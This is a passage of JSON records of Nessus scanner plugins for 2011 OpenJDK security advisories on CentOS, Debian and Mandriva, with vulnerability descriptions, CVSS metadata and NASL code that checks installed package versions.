trusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag '-Djsse.enableCBCProtection=false' to the java command.\n\nAn information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "edition": 9, "reporter": "Tenable", "published": "2011-10-20T00:00:00", "title": "CentOS 5 : java-1.6.0-openjdk (CESA-2011:1380) (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-1.6.0-openjdk", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2011-1380.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56558", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1380 and \n# CentOS Errata and Security Advisory 2011:1380 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56558);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\", \"CVE-2011-3560\");\n script_bugtraq_id(49388, 49778, 50211, 50215, 50216, 50218, 50224, 50231, 50234, 50236, 50242, 50243, 50246, 50248);\n script_xref(name:\"RHSA\", value:\"2011:1380\");\n\n script_name(english:\"CentOS 5 : java-1.6.0-openjdk (CESA-2011:1380) (BEAST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix several security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nA flaw was found in the Java RMI (Remote Method Invocation) registry\nimplementation. A remote RMI client could use this flaw to execute\narbitrary code on the RMI server running the registry. (CVE-2011-3556)\n\nA flaw was found in the Java RMI registry implementation. A remote RMI\nclient could use this flaw to execute code on the RMI server with\nunrestricted privileges. (CVE-2011-3557)\n\nA flaw was found in the IIOP (Internet Inter-Orb Protocol)\ndeserialization code. An untrusted Java application or applet running\nin a sandbox could use this flaw to bypass sandbox restrictions by\ndeserializing specially crafted input. (CVE-2011-3521)\n\nIt was found that the Java ScriptingEngine did not properly restrict\nthe privileges of sandboxed applications. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3544)\n\nA flaw was found in the AWTKeyStroke implementation. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass sandbox restrictions. (CVE-2011-3548)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the Java2D code used to perform transformations of graphic\nshapes and images. An untrusted Java application or applet running in\na sandbox could use this flaw to bypass sandbox restrictions.\n(CVE-2011-3551)\n\nAn insufficient error checking flaw was found in the unpacker for JAR\nfiles in pack200 format. A specially crafted JAR file could use this\nflaw to crash the Java Virtual Machine (JVM) or, possibly, execute\narbitrary code with JVM privileges. (CVE-2011-3554)\n\nIt was found that HttpsURLConnection did not perform SecurityManager\nchecks in the setSSLSocketFactory method. An untrusted Java\napplication or applet running in a sandbox could use this flaw to\nbypass connection restrictions defined in the policy. (CVE-2011-3560)\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\nciphers in cipher-block chaining (CBC) mode. An attacker able to\nperform a chosen plain text attack against a connection mixing trusted\nand untrusted data could use this flaw to recover portions of the\ntrusted data sent over the connection. (CVE-2011-3389)\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the\nfirst application data record byte to a separate SSL/TLS protocol\nrecord. This mitigation may cause compatibility issues with some\nSSL/TLS implementations and can be disabled using the\njsse.enableCBCProtection boolean property. This can be done on the\ncommand line by appending the flag '-Djsse.enableCBCProtection=false'\nto the java command.\n\nAn information leak flaw was found in the InputStream.skip\nimplementation. An untrusted Java application or applet could possibly\nuse this flaw to obtain bytes skipped by other threads.\n(CVE-2011-3547)\n\nA flaw was found in the Java HotSpot virtual machine. An untrusted\nJava application or applet could use this flaw to disclose portions of\nthe VM memory, or cause it to crash. (CVE-2011-3558)\n\nThe Java API for XML Web Services (JAX-WS) implementation in OpenJDK\nwas configured to include the stack trace in error messages sent to\nclients. A remote client could possibly use this flaw to obtain\nsensitive information. (CVE-2011-3553)\n\nIt was found that Java applications running with SecurityManager\nrestrictions were allowed to use too many UDP sockets by default. If\nmultiple instances of a malicious application were started at the same\ntime, they could exhaust all available UDP sockets on the system.\n(CVE-2011-3552)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.9.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018121.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5016922f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-October/018122.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9700d25e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.23.1.9.10.el5_7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-11T12:51:13", "references": ["https://packages.debian.org/source/squeeze/openjdk-6", "https://security-tracker.debian.org/tracker/CVE-2011-3553", "https://security-tracker.debian.org/tracker/CVE-2011-3389", "https://security-tracker.debian.org/tracker/CVE-2011-3544", "https://security-tracker.debian.org/tracker/CVE-2011-3547", "https://security-tracker.debian.org/tracker/CVE-2011-3521", "https://www.debian.org/security/2011/dsa-2356", "https://security-tracker.debian.org/tracker/CVE-2011-3554", "https://security-tracker.debian.org/tracker/CVE-2011-3548", "https://security-tracker.debian.org/tracker/CVE-2011-3552", "https://security-tracker.debian.org/tracker/CVE-2011-3560", "https://security-tracker.debian.org/tracker/CVE-2011-3557", "https://security-tracker.debian.org/tracker/CVE-2011-3551", "https://security-tracker.debian.org/tracker/CVE-2011-3556"], "pluginID": "56987", "description": "Several vulnerabilities have been discovered in OpenJDK, an implementation of the Java platform :\n\n - CVE-2011-3389 The TLS implementation does not guard properly against certain chosen-plaintext attacks when block ciphers are used in CBC mode.\n\n - CVE-2011-3521 The CORBA implementation contains a deserialization vulnerability in the IIOP implementation, allowing untrusted Java code (such as applets) to elevate its privileges.\n\n - CVE-2011-3544 The Java scripting engine lacks necessary security manager checks, allowing untrusted Java code (such as applets) to elevate its privileges.\n\n - CVE-2011-3547 The skip() method in java.io.InputStream uses a shared buffer, allowing untrusted Java code (such as applets) to access data that is skipped by other code.\n\n - CVE-2011-3548 The java.awt.AWTKeyStroke class contains a flaw which allows untrusted Java code (such as applets) to elevate its privileges.\n\n - CVE-2011-3551 The Java2D C code contains an integer overflow which results in a heap-based buffer overflow, potentially allowing untrusted Java code (such as applets) to elevate its privileges.\n\n - CVE-2011-3552 Malicous Java code can use up an excessive amount of UDP ports, leading to a denial of service.\n\n - CVE-2011-3553 JAX-WS enables stack traces for certain server responses by default, potentially leaking sensitive information.\n\n - CVE-2011-3554 JAR files in pack200 format are not properly checked for errors, potentially leading to arbitrary code execution when unpacking crafted pack200 files.\n\n - CVE-2011-3556 The RMI Registry server lacks access restrictions on certain methods, allowing a remote client to execute arbitary code.\n\n - CVE-2011-3557 The RMI Registry server fails to properly restrict privileges of untrusted Java code, allowing RMI clients to elevate their privileges on the RMI Registry server.\n\n - CVE-2011-3560 The com.sun.net.ssl.HttpsURLConnection class does not perform proper security manager checks in the setSSLSocketFactory() method, allowing untrusted Java code to bypass security policy restrictions.", "edition": 8, "reporter": "Tenable", "published": "2011-12-02T00:00:00", "title": "Debian DSA-2356-1 : openjdk-6 - several vulnerabilities (BEAST)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:openjdk-6"], "id": "DEBIAN_DSA-2356.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56987", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2356. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56987);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/11/10 11:49:35\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3560\");\n script_bugtraq_id(49388, 49778, 50211, 50215, 50216, 50218, 50224, 50231, 50234, 50236, 50243, 50246, 50248);\n script_xref(name:\"DSA\", value:\"2356\");\n\n script_name(english:\"Debian DSA-2356-1 : openjdk-6 - several vulnerabilities (BEAST)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in OpenJDK, an\nimplementation of the Java platform :\n\n - CVE-2011-3389\n The TLS implementation does not guard properly against\n certain chosen-plaintext attacks when block ciphers are\n used in CBC mode.\n\n - CVE-2011-3521\n The CORBA implementation contains a deserialization\n vulnerability in the IIOP implementation, allowing\n untrusted Java code (such as applets) to elevate its\n privileges.\n\n - CVE-2011-3544\n The Java scripting engine lacks necessary security\n manager checks, allowing untrusted Java code (such as\n applets) to elevate its privileges.\n\n - CVE-2011-3547\n The skip() method in java.io.InputStream uses a shared\n buffer, allowing untrusted Java code (such as applets)\n to access data that is skipped by other code.\n\n - CVE-2011-3548\n The java.awt.AWTKeyStroke class contains a flaw which\n allows untrusted Java code (such as applets) to elevate\n its privileges.\n\n - CVE-2011-3551\n The Java2D C code contains an integer overflow which\n results in a heap-based buffer overflow, potentially\n allowing untrusted Java code (such as applets) to\n elevate its privileges.\n\n - CVE-2011-3552\n Malicous Java code can use up an excessive amount of UDP\n ports, leading to a denial of service.\n\n - CVE-2011-3553\n JAX-WS enables stack traces for certain server responses\n by default, potentially leaking sensitive information.\n\n - CVE-2011-3554\n JAR files in pack200 format are not properly checked for\n errors, potentially leading to arbitrary code execution\n when unpacking crafted pack200 files.\n\n - CVE-2011-3556\n The RMI Registry server lacks access restrictions on\n certain methods, allowing a remote client to execute\n arbitary code.\n\n - CVE-2011-3557\n The RMI Registry server fails to properly restrict\n privileges of untrusted Java code, allowing RMI clients\n to elevate their privileges on the RMI Registry server.\n\n - CVE-2011-3560\n The com.sun.net.ssl.HttpsURLConnection class does not\n perform proper security manager checks in the\n setSSLSocketFactory() method, allowing untrusted Java\n code to bypass security policy restrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3544\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3551\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3560\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/openjdk-6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2356\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openjdk-6 packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 6b18-1.8.10-0+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java RMI Server Insecure Default Configuration Java Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openjdk-6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"icedtea-6-jre-cacao\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-dbg\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-demo\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-doc\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-jdk\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-jre\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-jre-headless\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-jre-lib\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-jre-zero\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openjdk-6-source\", reference:\"6b18-1.8.10-0+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:03:38", "references": [], "pluginID": "56809", "description": "Security issues were identified and fixed in openjdk (icedtea6) and icedtea-web :\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking (CVE-2011-3547).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT (CVE-2011-3548).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D (CVE-2011-3551).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect integrity via unknown vectors related to Networking (CVE-2011-3552).\n\nIcedTea6 prior to 1.10.4 allows remote authenticated users to affect confidentiality, related to JAXWS (CVE-2011-3553).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting (CVE-2011-3544).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization (CVE-2011-3521).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors (CVE-2011-3554).\n\nA flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection (CVE-2011-3389).\n\nNote: This update mitigates the CVE-2011-3389 issue by splitting the first application data record byte to a separate SSL/TLS protocol record. This mitigation may cause compatibility issues with some SSL/TLS implementations and can be disabled using the jsse.enableCBCProtection boolean property. This can be done on the command line by appending the flag -Djsse.enableCBCProtection=false to the java command.\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot (CVE-2011-3558).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect confidentiality, integrity, and availability, related to RMI (CVE-2011-3556).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect confidentiality, integrity, and availability, related to RMI (CVE-2011-3557).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity, related to JSSE (CVE-2011-3560).\n\nDeepak Bhole discovered a flaw in the Same Origin Policy (SOP) implementation in the IcedTea project Web browser plugin. A malicious applet could use this flaw to bypass SOP protection and open connections to any sub-domain of the second-level domain of the applet's origin, as well as any sub-domain of the domain that is the suffix of the origin second-level domain. For example, IcedTea-Web plugin allowed applet from some.host.example.com to connect to other.host.example.com, www.example.com, and example.com, as well as www.ample.com or ample.com. (CVE-2011-3377).", "edition": 7, "reporter": "Tenable", "published": "2011-11-14T00:00:00", "title": "Mandriva Linux Security Advisory : java-1.6.0-openjdk (MDVSA-2011:170)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3377", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:java-1.6.0-openjdk", "p-cpe:/a:mandriva:linux:icedtea-web", "p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-demo", "p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-javadoc", "cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-src", "p-cpe:/a:mandriva:linux:java-1.6.0-openjdk-devel"], "id": "MANDRIVA_MDVSA-2011-170.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56809", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:170. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56809);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/19 20:59:17\");\n\n script_cve_id(\n \"CVE-2011-3377\",\n \"CVE-2011-3389\",\n \"CVE-2011-3521\",\n \"CVE-2011-3544\",\n \"CVE-2011-3547\",\n \"CVE-2011-3548\",\n \"CVE-2011-3551\",\n \"CVE-2011-3552\",\n \"CVE-2011-3553\",\n \"CVE-2011-3554\",\n \"CVE-2011-3556\",\n \"CVE-2011-3557\",\n \"CVE-2011-3558\",\n \"CVE-2011-3560\"\n );\n script_bugtraq_id(\n 49778,\n 50211,\n 50215,\n 50216,\n 50218,\n 50224,\n 50231,\n 50234,\n 50236,\n 50242,\n 50243,\n 50246,\n 50248,\n 50610\n );\n script_xref(name:\"MDVSA\", value:\"2011:170\");\n\n script_name(english:\"Mandriva Linux Security Advisory : java-1.6.0-openjdk (MDVSA-2011:170)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security issues were identified and fixed in openjdk (icedtea6) and\nicedtea-web :\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality via\nunknown vectors related to Networking (CVE-2011-3547).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality,\nintegrity, and availability, related to AWT (CVE-2011-3548).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect\nconfidentiality, integrity, and availability via unknown vectors\nrelated to 2D (CVE-2011-3551).\n\nIcedTea6 prior to 1.10.4 allows remote attackers to affect integrity\nvia unknown vectors related to Networking (CVE-2011-3552).\n\nIcedTea6 prior to 1.10.4 allows remote authenticated users to affect\nconfidentiality, related to JAXWS (CVE-2011-3553).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality,\nintegrity, and availability via unknown vectors related to Scripting\n(CVE-2011-3544).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality,\nintegrity, and availability via unknown vectors related to\nDeserialization (CVE-2011-3521).\n\nIcedTea6 prior to 1.10.4 allows remote untrusted Java Web Start\napplications and untrusted Java applets to affect confidentiality,\nintegrity, and availability via unknown 